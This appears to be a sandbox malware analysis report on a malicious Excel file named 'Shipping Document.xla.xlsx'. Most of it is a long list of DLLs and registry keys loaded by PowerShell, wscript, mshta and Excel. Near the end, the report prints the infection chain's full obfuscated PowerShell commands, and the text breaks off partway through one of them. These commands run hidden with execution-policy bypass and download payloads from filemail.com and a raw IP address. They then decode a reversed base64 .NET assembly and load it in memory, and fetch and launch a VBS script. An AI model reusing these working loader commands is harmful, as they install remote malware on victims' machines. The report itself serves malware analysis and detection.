Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdb source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdbhP source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp

Source: 02B30000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Shipping Document.xla.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ 